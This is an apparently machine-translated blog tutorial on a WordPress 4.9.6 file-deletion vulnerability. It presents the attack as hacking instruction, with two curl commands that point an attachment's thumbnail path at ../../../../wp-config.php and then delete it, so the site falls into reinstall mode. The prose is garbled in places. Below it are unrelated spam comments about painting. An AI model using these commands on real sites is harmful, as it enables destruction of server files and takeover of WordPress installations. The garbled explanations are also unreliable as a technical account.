WordPress vulnerability version 4.9.6

4
645

WordPress exploit | Introducing WordPress New Vulnerabilities to Delete Sensitive Files and Reset WordPress, as well as Other Accessibility

Google image

Description of WordPress and WordPress exploit

WordPress is a very popular web content management system that allows you to launch your blog in less than 5 minutes.
For this reason, many users are attracted to their site and a large volume of sites on the world are based on this content management system.
In this tutorial, we introduce the new WordPress security hole and give it a full explanation

 WordPress exploit Proof of concept

In the new version of WordPress, version  4.9.6 , an important vulnerability has been discovered and we are seeing its exploit sites This vulnerability makes it possible for perpetrators to remove files inside the server directory, which can cause many problems.

For example, WordPress’s config file is one of the most important files in the directory, if it is deleted.
WordPress Reset is given to a person and you can reboot the system with a new one.

How to use and teach hacking

In the media section, we upload a new image and enter in the change log. 

Enter your Linux login here and make sure the  curl service is installed 

After that, delete the file you want to delete

1curl -v ‘http://site.com/wp-admin/post.php?post=4’ -H ‘Cookie: ***’ -d ‘action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php’

Enter the address of the site in the site section and at the end of the desired page like Config.php you can select to remove.

Now the selected file is selected and we will do the following to remove it

1curl -v ‘http://site.com/wp-admin/post.php?post=4’ -H ‘Cookie: ***’ -d ‘action=delete&_wpnonce=***’

After executing the command above, you successfully run the exploit.

Proof of concept

4 COMMENTS

  1. This work reveals some sort of poetic mood and everyone would
    easily be attracted by it. A vector path, it doesn’t matter what
    the twists and turns are, may well be more elastic and scalable.

    The beginning of Leonardo’s life was dedicated to art and painting in particular.

  2. This work reveals some sort of poetic mood and everyone would be easily attracted by it.

    in April 22, 1560, he explained:” Your Majesty, you’re invincible and hold the world in awe. The art gallery also serves enormous events all parts of the globe.

  3. In cases like this, you simply must invest in a straight-forward picture frames.
    Leonardo Da Vinci was born inside Florentine Republic on April
    15th, 1452. Matisse also took over as king of the Fauvism and was famous within the art
    circle.

  4. Should your motive here is to learn paintings on the market Melbourne or paintings available for sale Brisbane, unfortunately but you can’t notice here.
    A vector path, it doesn’t matter what the twists and turns are, could be more
    elastic and scalable. As modern humanity exposes their tanned skin during vacations that
    they like to show off their pictures in social media websites.

LEAVE A REPLY

Please enter your comment!
Please enter your name here